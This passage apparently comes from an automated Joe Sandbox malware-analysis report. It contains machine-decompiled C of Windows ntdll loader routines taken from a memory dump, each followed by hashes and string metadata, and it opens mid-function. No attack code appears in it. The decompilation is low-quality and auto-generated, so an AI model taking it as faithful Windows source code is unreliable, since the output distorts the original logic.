                                                                            								__eflags = _t60;
                                                                            								if(_t60 == 0) {
                                                                            									continue;
                                                                            								} else {
                                                                            									goto L20;
                                                                            								}
                                                                            								do {
                                                                            									L20:
                                                                            									_t51 =  *_t60;
                                                                            									_t69 = _t60;
                                                                            									_t60 = _t51;
                                                                            									__eflags = _t51;
                                                                            								} while (_t51 != 0);
                                                                            							}
                                                                            							_t70 = 0xffbadd11;
                                                                            							goto L27;
                                                                            						}
                                                                            						_t52 =  *(_t69 + 4);
                                                                            						L9:
                                                                            						__eflags = _t64;
                                                                            						if(_t64 == 0) {
                                                                            							L12:
                                                                            							_t69 = _t52;
                                                                            							continue;
                                                                            						}
                                                                            						__eflags = _t52;
                                                                            						if(_t52 == 0) {
                                                                            							goto L12;
                                                                            						}
                                                                            						_t69 = _t69 ^ _t52;
                                                                            						continue;
                                                                            					}
                                                                            					_t52 =  *_t69;
                                                                            					goto L9;
                                                                            				}
                                                                            				goto L25;
                                                                            			}



























                                                                            APIs
                                                                            Strings
                                                                            • LdrpCheckRedirection, xrefs: 1D85450F
                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 1D854519
                                                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 1D854508
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                            • API String ID: 3446177414-3154609507
                                                                            • Opcode ID: f0814657ee4adc811478e8eb9267856275e829f606a45bb10a5eddaa0ab6cb67
                                                                            • Instruction ID: e8b266b47f83d19a8311e26dc2d0f3acde262d7646bbdf29f494097cd269b1b7
                                                                            • Opcode Fuzzy Hash: f0814657ee4adc811478e8eb9267856275e829f606a45bb10a5eddaa0ab6cb67
                                                                            • Instruction Fuzzy Hash: CD41B172746621DFCB11CF5CC940E667BE4BF88A50F0646AAFD9897265D731E800CB93
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID:
                                                                            • API String ID: 3446177414-0
                                                                            • Opcode ID: 9290e77d9c1d9cfa213a643d8559ca37f309619800b8c8e11be4c6f2129aa0c6
                                                                            • Instruction ID: 0d0fffe70314c9336578ccbb030510b294563b69af1a4453ca6e7583251b08f9
                                                                            • Opcode Fuzzy Hash: 9290e77d9c1d9cfa213a643d8559ca37f309619800b8c8e11be4c6f2129aa0c6
                                                                            • Instruction Fuzzy Hash: 4F515B35700A26EFDB09CF18C8D5A2AB7E1FB89710B11416DE90AD7B10DB75EC41CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 29%
                                                                            			E1D807A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                            				signed int _t34;
                                                                            				signed int _t35;
                                                                            				signed int _t40;
                                                                            				intOrPtr _t42;
                                                                            				void* _t50;
                                                                            				intOrPtr* _t55;
                                                                            				intOrPtr* _t69;
                                                                            				void* _t73;
                                                                            
                                                                            				_t63 = __edx;
                                                                            				_t51 = __ebx;
                                                                            				_push(0x30);
                                                                            				_push(0x1d8ac840);
                                                                            				E1D827BE4(__ebx, __edi, __esi);
                                                                            				_t66 = __ecx;
                                                                            				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
                                                                            				_t69 =  *0x1d8c5a7c;
                                                                            				_push(__edx);
                                                                            				if(_t69 == 0) {
                                                                            					 *0x1d8c91e0();
                                                                            					E1D80B490(__ecx, __edx,  *__ecx());
                                                                            					_t55 =  *((intOrPtr*)(_t73 - 0x14));
                                                                            					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
                                                                            					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
                                                                            					_t34 =  *0x1d8c5d38; // 0xb517a9a0
                                                                            					 *(_t73 - 0x30) = _t34;
                                                                            					__eflags =  *0x1d8c65fc; // 0x1d0dba41
                                                                            					if(__eflags == 0) {
                                                                            						_push(0);
                                                                            						_push(4);
                                                                            						_push(_t73 - 0x2c);
                                                                            						_push(0x24);
                                                                            						_push(0xffffffff);
                                                                            						 *(_t73 - 0x1c) = E1D812B20();
                                                                            						__eflags =  *(_t73 - 0x1c);
                                                                            						if( *(_t73 - 0x1c) < 0) {
                                                                            							E1D828AA0(_t55, _t63,  *(_t73 - 0x1c));
                                                                            						}
                                                                            						 *0x1d8c65fc =  *(_t73 - 0x2c);
                                                                            					}
                                                                            					_t35 =  *0x1d8c65fc; // 0x1d0dba41
                                                                            					 *(_t73 - 0x20) = _t35;
                                                                            					_push(0x20);
                                                                            					asm("ror eax, cl");
                                                                            					 *(_t73 - 0x34) =  *(_t73 - 0x30);
                                                                            					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
                                                                            					__eflags = _t40;
                                                                            					 *(_t73 - 0x38) = _t40;
                                                                            					if(__eflags == 0) {
                                                                            						 *((intOrPtr*)(_t73 - 0x3c)) = E1D888890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x1d7a50b4);
                                                                            						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
                                                                            					} else {
                                                                            						 *0x1d8c91e0( *((intOrPtr*)(_t73 - 0x24)));
                                                                            						_t42 =  *( *(_t73 - 0x38))();
                                                                            					}
                                                                            					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
                                                                            					return  *((intOrPtr*)(_t73 - 0x28));
                                                                            				} else {
                                                                            					 *0x1d8c91e0();
                                                                            					_t50 =  *_t69();
                                                                            					 *(_t73 - 4) = 0xfffffffe;
                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
                                                                            					return _t50;
                                                                            				}
                                                                            			}












                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                            • String ID:
                                                                            • API String ID: 4281723722-0
                                                                            • Opcode ID: 8bfe11fd75103dff1a50220738d4982e1b74df40846f81f64b558f9c6b4763a3
                                                                            • Instruction ID: 3715d0adc553fdbdb34e0e45efbbb9c1f8e46c4ef802c15955e5c43daf1328d3
                                                                            • Opcode Fuzzy Hash: 8bfe11fd75103dff1a50220738d4982e1b74df40846f81f64b558f9c6b4763a3
                                                                            • Instruction Fuzzy Hash: 09310F75E00228DFCF05DFA9D885B9EBBB0AB4C760F21816AE511B7290DB34A900CF52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 50%
                                                                            			E1D804B79(intOrPtr* __ecx, signed int __edx) {
                                                                            				signed int _v8;
                                                                            				signed int _v60;
                                                                            				intOrPtr _v64;
                                                                            				intOrPtr _v68;
                                                                            				signed int _v72;
                                                                            				intOrPtr _v76;
                                                                            				signed int _v84;
                                                                            				signed int _v88;
                                                                            				char _v92;
                                                                            				signed int _v96;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				signed int _t82;
                                                                            				signed int _t86;
                                                                            				signed int _t89;
                                                                            				intOrPtr* _t97;
                                                                            				signed int _t99;
                                                                            				void* _t102;
                                                                            				void* _t104;
                                                                            				signed int _t111;
                                                                            				intOrPtr* _t112;
                                                                            				intOrPtr* _t113;
                                                                            				signed int _t114;
                                                                            				void* _t115;
                                                                            
                                                                            				_t107 = __edx;
                                                                            				_t72 =  *0x1d8cb370 ^ _t114;
                                                                            				_v8 =  *0x1d8cb370 ^ _t114;
                                                                            				_t110 = __ecx;
                                                                            				_v96 = __edx;
                                                                            				_t99 = __edx;
                                                                            				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
                                                                            					L12:
                                                                            					return E1D814B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
                                                                            				} else {
                                                                            					_t110 = __ecx + 4;
                                                                            					_t97 =  *_t110;
                                                                            					while(_t97 != _t110) {
                                                                            						_t6 = _t97 - 8; // -4
                                                                            						_t111 = _t6;
                                                                            						_t107 = 1;
                                                                            						if( *_t111 != 0x74736c46) {
                                                                            							_v84 = _v84 & 0x00000000;
                                                                            							_push( &_v92);
                                                                            							_v76 = 4;
                                                                            							_v72 = 1;
                                                                            							_v68 = 1;
                                                                            							_v64 = _t110;
                                                                            							_v60 = _t111;
                                                                            							_v92 = 0xc0150015;
                                                                            							_v88 = 1;
                                                                            							E1D828A60(_t99, 1);
                                                                            							_t99 = _v96;
                                                                            							_t107 = 1;
                                                                            						}
                                                                            						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
                                                                            							_v84 = _v84 & 0x00000000;
                                                                            							_push( &_v92);
                                                                            							_v76 = 4;
                                                                            							_v72 = _t107;
                                                                            							_v68 = 2;
                                                                            							_v64 = _t110;
                                                                            							_v60 = _t111;
                                                                            							_v92 = 0xc0150015;
                                                                            							_v88 = _t107;
                                                                            							E1D828A60(_t99, _t107);
                                                                            							_t99 = _v96;
                                                                            						}
                                                                            						_t9 = _t111 + 0x18; // 0x1c
                                                                            						_t72 = _t9;
                                                                            						if(_t99 < _t9) {
                                                                            							L13:
                                                                            							_t97 =  *_t97;
                                                                            							continue;
                                                                            						} else {
                                                                            							_t10 = _t111 + 0x618; // 0x614
                                                                            							_t72 = _t10;
                                                                            							if(_t99 >= _t10) {
                                                                            								goto L13;
                                                                            							} else {
                                                                            								_v96 = 0x30;
                                                                            								_t82 = _t99 - _t111 - 0x18;
                                                                            								asm("cdq");
                                                                            								_t107 = _t82 % _v96;
                                                                            								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
                                                                            								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
                                                                            									_t72 =  *(_t111 + 4);
                                                                            									if(_t72 != 0) {
                                                                            										_t86 = _t72 - 1;
                                                                            										 *(_t111 + 4) = _t86;
                                                                            										_t72 =  !_t86;
                                                                            										 *(_t111 + 0x14) =  !_t86;
                                                                            										 *((intOrPtr*)(_t99 + 8)) = 4;
                                                                            										if( *(_t111 + 4) == 0) {
                                                                            											_t72 =  *(_t97 + 4);
                                                                            											if(_t72 != _t110) {
                                                                            												do {
                                                                            													_t111 =  *(_t72 + 4);
                                                                            													_t56 = _t72 - 8; // 0xfffffff6
                                                                            													_t107 = _t56;
                                                                            													if( *((intOrPtr*)(_t107 + 4)) != 0) {
                                                                            														goto L33;
                                                                            													} else {
                                                                            														_t102 =  *_t72;
                                                                            														if( *(_t102 + 4) != _t72 ||  *_t111 != _t72) {
                                                                            															_push(3);
                                                                            															asm("int 0x29");
                                                                            															_t104 = 0x3f;
                                                                            															if( *((intOrPtr*)(_t72 + 2)) == _t104 &&  *(_t72 + 4) == _t104 &&  *((intOrPtr*)(_t72 + 6)) == _t111 &&  *(_t72 + 8) != _t97 &&  *((short*)(_t72 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t72 + 0xc)) == _t111) {
                                                                            																_t72 = _t72 + 8;
                                                                            															}
                                                                            															_t112 =  *0x1d8c65e4; // 0x76f9f0e0
                                                                            															 *0x1d8c91e0(_t107, _t72,  &_v8);
                                                                            															_t113 =  *_t112();
                                                                            															if(_t113 >= 0) {
                                                                            																L18:
                                                                            																_t89 = _v8;
                                                                            																if(_t89 != 0) {
                                                                            																	if( *(_t110 + 0x48) != _t97) {
                                                                            																		E1D7D26A0(_t89,  *(_t110 + 0x48));
                                                                            																		_t89 = _v8;
                                                                            																	}
                                                                            																	 *(_t110 + 0x48) = _t89;
                                                                            																}
                                                                            																if(_t113 < 0) {
                                                                            																	if(( *0x1d8c37c0 & 0x00000003) != 0) {
                                                                            																		E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", _t97, "Querying the active activation context failed with status 0x%08lx\n", _t113);
                                                                            																	}
                                                                            																	if(( *0x1d8c37c0 & 0x00000010) != 0) {
                                                                            																		asm("int3");
                                                                            																	}
                                                                            																}
                                                                            																return _t113;
                                                                            															} else {
                                                                            																if(_t113 != 0xc000008a) {
                                                                            																	if(_t113 == 0xc000008b || _t113 == 0xc0000089 || _t113 == 0xc000000f || _t113 == 0xc0000204 || _t113 == 0xc0000002) {
                                                                            																		goto L16;
                                                                            																	} else {
                                                                            																		if(_t113 != 0xc00000bb) {
                                                                            																			goto L18;
                                                                            																		} else {
                                                                            																			goto L16;
                                                                            																		}
                                                                            																	}
                                                                            																	goto L53;
                                                                            																} else {
                                                                            																	L16:
                                                                            																	if(( *0x1d8c37c0 & 0x00000005) != 0) {
                                                                            																		_push(_t113);
                                                                            																		_t67 = _t110 + 0x24; // 0x123
                                                                            																		E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t67);
                                                                            																		_t115 = _t115 + 0x1c;
                                                                            																	}
                                                                            																	_t113 = _t97;
                                                                            																}
                                                                            																goto L18;
                                                                            															}
                                                                            														} else {
                                                                            															 *_t111 = _t102;
                                                                            															 *(_t102 + 4) = _t111;
                                                                            															E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t107);
                                                                            															goto L33;
                                                                            														}
                                                                            													}
                                                                            													goto L53;
                                                                            													L33:
                                                                            													_t72 = _t111;
                                                                            												} while (_t111 != _t110);
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								goto L12;
                                                                            							}
                                                                            						}
                                                                            						goto L53;
                                                                            					}
                                                                            					goto L12;
                                                                            				}
                                                                            				L53:
                                                                            			}

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$Flst
                                                                            • API String ID: 0-758220159
                                                                            • Opcode ID: b2925e95286255e0fc20d3b2d6cfa6a5c700c26900eeb3561646f722f4521067
                                                                            • Instruction ID: d0e735231799c211d633c8d0fea366b830a7a91c94e10d83c2b94804be2dfb18
                                                                            • Opcode Fuzzy Hash: b2925e95286255e0fc20d3b2d6cfa6a5c700c26900eeb3561646f722f4521067
                                                                            • Instruction Fuzzy Hash: 28519AB1E40699DFDB15CF9CC9847A9FBF4EF44719F25C02AE0499B250E7B09981CB82
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 66%
                                                                            			E1D7D0485(intOrPtr* __ecx) {
                                                                            				char _v8;
                                                                            				intOrPtr _v12;
                                                                            				char _v16;
                                                                            				char _v20;
                                                                            				char _v24;
                                                                            				char _v28;
                                                                            				char _v32;
                                                                            				char _t50;
                                                                            				intOrPtr* _t51;
                                                                            				intOrPtr* _t73;
                                                                            				intOrPtr _t76;
                                                                            				char _t84;
                                                                            				void* _t85;
                                                                            				intOrPtr _t86;
                                                                            				intOrPtr* _t89;
                                                                            
                                                                            				_t89 = __ecx;
                                                                            				_t76 =  *[fs:0x30];
                                                                            				_t73 =  *0x1d8c6630; // 0x0
                                                                            				_v32 = 0;
                                                                            				_v28 = 0;
                                                                            				_v8 = 0;
                                                                            				 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t76 + 0xa4));
                                                                            				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t76 + 0xa8));
                                                                            				 *(__ecx + 0xc) =  *(_t76 + 0xac) & 0x0000ffff;
                                                                            				_v12 = _t76;
                                                                            				 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(_t76 + 0xb0));
                                                                            				_t84 = 0;
                                                                            				if(_t73 == 0) {
                                                                            					_t73 = E1D7D82E0(0xabababab, 0, "kLsE", 0);
                                                                            					 *0x1d8c6630 = _t73;
                                                                            					if(_t73 != 0) {
                                                                            						goto L1;
                                                                            					}
                                                                            					L4:
                                                                            					_t85 = _t84 - 1;
                                                                            					if(_t85 == 0) {
                                                                            						 *((intOrPtr*)(_t89 + 8)) = 2;
                                                                            						 *((intOrPtr*)(_t89 + 0xc)) = 0x23f0;
                                                                            						L19:
                                                                            						 *((intOrPtr*)(_t89 + 4)) = 6;
                                                                            						L6:
                                                                            						_t86 = _v12;
                                                                            						_t51 =  *((intOrPtr*)(_t86 + 0x1f4));
                                                                            						if(_t51 == 0 ||  *_t51 == 0) {
                                                                            							L8:
                                                                            							 *((short*)(_t89 + 0x14)) = 0;
                                                                            							goto L9;
                                                                            						} else {
                                                                            							_t38 = _t89 + 0x14; // 0x130
                                                                            							if(E1D7F5C3F(_t38, 0x100, _t51) >= 0) {
                                                                            								L9:
                                                                            								if( *_t89 != 0x11c) {
                                                                            									if( *_t89 != 0x124) {
                                                                            										L16:
                                                                            										return 0;
                                                                            									}
                                                                            								}
                                                                            								 *((short*)(_t89 + 0x114)) =  *(_t86 + 0xaf) & 0x000000ff;
                                                                            								 *(_t89 + 0x116) =  *(_t86 + 0xae) & 0x000000ff;
                                                                            								 *(_t89 + 0x118) = E1D7D0670();
                                                                            								if( *_t89 == 0x124) {
                                                                            									 *(_t89 + 0x11c) = E1D7D0670() & 0x0001ffff;
                                                                            								}
                                                                            								 *((char*)(_t89 + 0x11a)) = 0;
                                                                            								if(E1D7D0630( &_v16) != 0) {
                                                                            									 *((char*)(_t89 + 0x11a)) = _v16;
                                                                            								}
                                                                            								E1D815050(0xff,  &_v32, L"TerminalServices-RemoteConnectionManager-AllowAppServerMode");
                                                                            								_push( &_v24);
                                                                            								_push(4);
                                                                            								_push( &_v8);
                                                                            								_push( &_v20);
                                                                            								_push( &_v32);
                                                                            								if(E1D813EE0() >= 0) {
                                                                            									if(_v8 == 1) {
                                                                            										if(_v20 != 4 || _v24 != 4) {
                                                                            											goto L15;
                                                                            										} else {
                                                                            											goto L16;
                                                                            										}
                                                                            									}
                                                                            									L15:
                                                                            									 *(_t89 + 0x118) =  *(_t89 + 0x118) & 0x0000ffef;
                                                                            									if( *_t89 == 0x124) {
                                                                            										 *(_t89 + 0x11c) =  *(_t89 + 0x11c) & 0x0001ffef;
                                                                            									}
                                                                            								}
                                                                            								goto L16;
                                                                            							}
                                                                            							goto L8;
                                                                            						}
                                                                            					}
                                                                            					if(_t85 == 1) {
                                                                            						 *((intOrPtr*)(_t89 + 8)) = 3;
                                                                            						 *((intOrPtr*)(_t89 + 0xc)) = 0x2580;
                                                                            						goto L19;
                                                                            					}
                                                                            					goto L6;
                                                                            				}
                                                                            				L1:
                                                                            				if(_t73 != E1D7D0690) {
                                                                            					 *0x1d8c91e0();
                                                                            					_t50 =  *_t73();
                                                                            				} else {
                                                                            					_t50 = E1D7D0690();
                                                                            				}
                                                                            				_t84 = _t50;
                                                                            				goto L4;
                                                                            			}
                                                                            0x1d7d05a1
                                                                            0x1d7d05a5
                                                                            0x1d7d05ad
                                                                            0x1d7d05b3
                                                                            0x1d82e9dd
                                                                            0x00000000
                                                                            0x1d82e9ed
                                                                            0x00000000
                                                                            0x1d82e9ed
                                                                            0x1d82e9dd
                                                                            0x1d7d05b9
                                                                            0x1d7d05be
                                                                            0x1d7d05c7
                                                                            0x1d82e9f2
                                                                            0x1d82e9f2
                                                                            0x1d7d05c7
                                                                            0x00000000
                                                                            0x1d7d05ad
                                                                            0x00000000
                                                                            0x1d82e9b2
                                                                            0x1d7d050c
                                                                            0x1d7d04fb
                                                                            0x1d82e989
                                                                            0x1d82e990
                                                                            0x00000000
                                                                            0x1d82e990
                                                                            0x00000000
                                                                            0x1d7d04fb
                                                                            0x1d7d04dc
                                                                            0x1d7d04e2
                                                                            0x1d7d05d6
                                                                            0x1d7d05dc
                                                                            0x1d7d04e8
                                                                            0x1d7d04e8
                                                                            0x1d7d04e8
                                                                            0x1d7d04ed
                                                                            0x00000000

                                                                            APIs
                                                                            Strings
                                                                            • kLsE, xrefs: 1D7D05FE
                                                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 1D7D0586
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                            • API String ID: 3446177414-2547482624
                                                                            • Opcode ID: 1f4beb6ec2759cf92b31748bfe99d271288cc76e8e2919ffb8df4477bf9de889
                                                                            • Instruction ID: 3d8fe6405c4641e948450925d63f5ee32b424cc2187ed1fab7f15cefc90602c3
                                                                            • Opcode Fuzzy Hash: 1f4beb6ec2759cf92b31748bfe99d271288cc76e8e2919ffb8df4477bf9de889
                                                                            • Instruction Fuzzy Hash: 4F51CD75A00B56DFC792DFA5C485AAAB7F4AF44360F00943EDA9A83240E774A544CBA3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 25%
                                                                            			E1D7CDF21(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                            				signed int _v8;
                                                                            				void* _v36;
                                                                            				intOrPtr _v48;
                                                                            				intOrPtr _v52;
                                                                            				intOrPtr _v56;
                                                                            				char _v60;
                                                                            				char _v64;
                                                                            				intOrPtr _v68;
                                                                            				intOrPtr _v72;
                                                                            				intOrPtr _v76;
                                                                            				intOrPtr _v80;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				intOrPtr _t48;
                                                                            				intOrPtr _t49;
                                                                            				intOrPtr _t50;
                                                                            				intOrPtr* _t52;
                                                                            				char _t56;
                                                                            				void* _t69;
                                                                            				char _t72;
                                                                            				void* _t73;
                                                                            				intOrPtr _t75;
                                                                            				intOrPtr _t79;
                                                                            				void* _t82;
                                                                            				void* _t84;
                                                                            				intOrPtr _t86;
                                                                            				void* _t88;
                                                                            				signed int _t90;
                                                                            				signed int _t92;
                                                                            				signed int _t93;
                                                                            
                                                                            				_t80 = __edx;
                                                                            				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                                                                            				_v8 =  *0x1d8cb370 ^ _t92;
                                                                            				_t72 = 0;
                                                                            				_v72 = __edx;
                                                                            				_t82 = __ecx;
                                                                            				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                                                                            				_v68 = _t86;
                                                                            				E1D818F40( &_v60, 0, 0x30);
                                                                            				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                                                                            				_t93 = _t92 + 0xc;
                                                                            				_v76 = _t48;
                                                                            				_t49 = _t48;
                                                                            				if(_t49 == 0) {
                                                                            					_push(5);
                                                                            					 *((char*)(_t82 + 0x6a)) = 0;
                                                                            					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                                                                            					goto L3;
                                                                            				} else {
                                                                            					_t69 = _t49 - 1;
                                                                            					if(_t69 != 0) {
                                                                            						if(_t69 == 1) {
                                                                            							_push(0xa);
                                                                            							goto L3;
                                                                            						} else {
                                                                            							_t56 = 0;
                                                                            						}
                                                                            					} else {
                                                                            						_push(4);
                                                                            						L3:
                                                                            						_pop(_t50);
                                                                            						_v80 = _t50;
                                                                            						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                                                                            							L1D7E2330(_t50, _t86 + 0x1c);
                                                                            							_t79 = _v72;
                                                                            							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                            							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                                                                            							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                                                                            							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                                                                            							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                                                                            							E1D7E24D0(_t86 + 0x1c);
                                                                            						}
                                                                            						_t75 = _v80;
                                                                            						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                                                                            						_t80 =  *_t52;
                                                                            						_v72 =  *((intOrPtr*)(_t52 + 4));
                                                                            						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                                                                            						_v60 = 0x30;
                                                                            						_v56 = _t75;
                                                                            						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                                                                            						asm("movsd");
                                                                            						_v76 = _t80;
                                                                            						_v64 = 0x30;
                                                                            						asm("movsd");
                                                                            						asm("movsd");
                                                                            						asm("movsd");
                                                                            						if(_t80 != 0) {
                                                                            							 *0x1d8c91e0(_t75, _v72,  &_v64,  &_v60);
                                                                            							_t72 = _v76();
                                                                            						}
                                                                            						_t56 = _t72;
                                                                            					}
                                                                            				}
                                                                            				_pop(_t84);
                                                                            				_pop(_t88);
                                                                            				_pop(_t73);
                                                                            				return E1D814B50(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                                                                            			}

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: 0$0
                                                                            • API String ID: 3446177414-203156872
                                                                            • Opcode ID: 417d6785102dab058d8805870b9524fa48a8a5bd5ee7db332e0ddb2efc775c1a
                                                                            • Instruction ID: 046575b892da7dd237c71d30421070ca1e84f9b997c7e9b21b1efb3b3dbd7879
                                                                            • Opcode Fuzzy Hash: 417d6785102dab058d8805870b9524fa48a8a5bd5ee7db332e0ddb2efc775c1a
                                                                            • Instruction Fuzzy Hash: 3D4169B16087429FC301CF2CC484A5ABBE4BB89724F044A6EF588DB340D771EA05CB86
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%